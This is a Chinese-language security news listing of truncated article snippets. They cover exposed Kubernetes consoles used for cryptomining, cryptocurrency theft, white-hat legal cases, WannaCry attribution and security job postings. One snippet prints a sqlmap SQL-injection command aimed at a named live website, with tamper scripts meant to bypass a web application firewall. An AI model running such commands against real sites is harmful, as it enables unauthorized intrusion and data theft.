14x Security Team

几个月前，RedLock云安全智能(CSI)团队发现了数百个Kubernetes管理控制台，这些控制台可以通过互联网上访问，但没有任何密码保护。其中一些案例属于英国跨国保险公司英杰华(Aviva)和全球最大的SIM卡制造商金雅拓(Gemalto)。在这些控制台中，可以访问这些组织的亚马逊网络服务(AWS)和Microsoft Azure环境的访问凭据。经过进一步的调查后，该团队确定黑客已经秘密渗透到这些组织的公共云环境中，并使用计算实例来挖掘加密货币(参阅云安全趋势——201...

黑客组织利用谷歌广告盗取逾5千万美元加密货币加密货币通常存储在交易所、采矿池或用户的个人钱包中，这使得个人的计算机和交所成为黑客的主要目标。不幸的是，近年来许多人都遭受了这种攻击。最大的几起攻击在加密世界人人皆知：Mt. Gox和Coincheck，它们曾遭遇了加密货币历史上最大的黑客，两次案件累计被盗窃近10亿美元，占据头条多日。Mt. Gox是一个主要的加密货币交易所，直到2014年，它遭受了历史上最大的加密货币黑客攻击。该起黑客事件的金额估计约为4.5亿美元，导致交...

奇虎360科技有限公司招聘代码安全研究员岗位描述：1. 分析被黑网站日志，针对一些大型网站进行安全评估；2. 进行APK木马样本分析并形成报告。任职要求1. 3-5年工作经验，最好有互联网公司从业背景、安全厂商工作背景更佳。2.熟悉主流web安全技术，如:SQL注入、XSS、CSRF、LFI/RFI文件包含等3. 了解渗透测试的流程、方法，以及测试用例4. 精通渗透测试工具的使用（NMAP、SQLMAP、AWVS、APPSCAN）5 熟悉web安全漏洞，开展漏洞挖掘分析、及漏...

白帽子黑客袁炜被抓事件：获取计算机系统数据罪与非罪的界限白帽子黑客袁炜被抓事件：获取计算机系统数据罪与非罪的界限因本案中已经公开的资料中，诸多细节点未得到司法机关官方公布。故依据最近来源原则，只局限于讨论袁炜父亲《致第四届网络安全大会的一封信-白帽子黑客检测漏洞到底是不是犯罪？》（以下简称《公开信》）中描述情况作分析。非法获取计算机信息系统数据罪”是个什么罪？公开信提到，2016年3月8日，北京市公安局朝阳分局以涉嫌非法获取计算机信息系统数据罪，将袁炜刑事拘留；4月12日，北...

CryKeX：Linux内存加密密钥提取工具CryKeX特性1.   跨平台2.   简单实用3.   交互性强4.   兼容性/可移植性强5.   应用程序独立6.   进程封装/注入依赖条件1.   Unix-理论上说，该工具可在任何基于Unix的操作系统平台上正常...

合众人寿招聘信息安全工程师公司介绍：合众人寿保险股份有限公司（以下简称合众人寿）（www.unionlife.com.cn）是经中国保险监督管理委员会批准的一家综合性人寿保险公司。企业性质为全国性、股份制寿险公司。作为综合性 人 寿保险公司，公司可经营一切人身险险种（含各种法定保险）。合众人寿率行业之先提出了”合众保险·理赔不难”的服务举措，为其在行业内外赢得了广泛赞誉。企业文化：合众人寿以中国传统思想的精髓”和合”文化为企业理念的基石，以”和合各方利益，实现多赢共好”为核心...

揭秘生物识别验证的 AI 攻防 | AI安全嘉年华·公开课目前生物识别的的确确经历着爆发式的发展，利用生物识别技术进行身份认证、人机交互已经成为重要趋势。生物特征应该具备这三个特性：一、唯一性二、稳定性：生物特征与别的钥匙、密码、磁卡这些容易丢失的不一样，你本人就是通行证，只要你人在生物特征就在。三、可采集：机器可以利用它进行识别，比如说人脸、虹膜可以通过摄像头采集，声音可以通过麦克风采集。而生物识别技术是AI最常见的应用领域之一，在这个领域里有哪些攻防正在发生呢？12月27...

朝鲜否认操纵WannaCry事件，称美国刻意制造妖魔论2017 年 10 月 30 日，英国一名高级官员表示他们非常肯定，在今年 5 月发生的 WannaCry 勒索事件，是由朝鲜方面发起的。而在该起事件中，英国的健康服务系统（NHS）遭受到了一定的损失：因系统故障导致多起手术计划被迫推迟。2017 年 12 月 18 日，美国特朗普政府晚间也公开发表声明，朝鲜就是此次 WannaCry 事件的幕后黑手——他们利用了泄漏的NSA黑客工具实施行动，在超过 150 个国家传播勒索...

sqlmap针对各种数据库绕防火墙注入插件 1 mysql绕过：root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversione...

揭秘“白帽子”黑客：靠本事挣钱 黑产利诱无处不在在国家网络安全宣传周首届网络安全技能大赛上，来自全国10所高校的10支顶尖战队一决高下，30名“白帽子”黑客捉对厮杀。　　资料图片　　网络安全隐患无处不在。近来，勒索病毒“永恒之蓝”和“必加”在全球大规模爆发，再次敲响了警钟。有攻就有防，面对网络世界的安全隐患，面对黑客攻击及其布下的陷阱，“白帽子”黑客是我们的第一道屏障。　　目前网络安全人才不足，既有供不应求的原因，也和人才培养模式相关。“白帽子”黑客们的工作究竟有哪些神秘之处...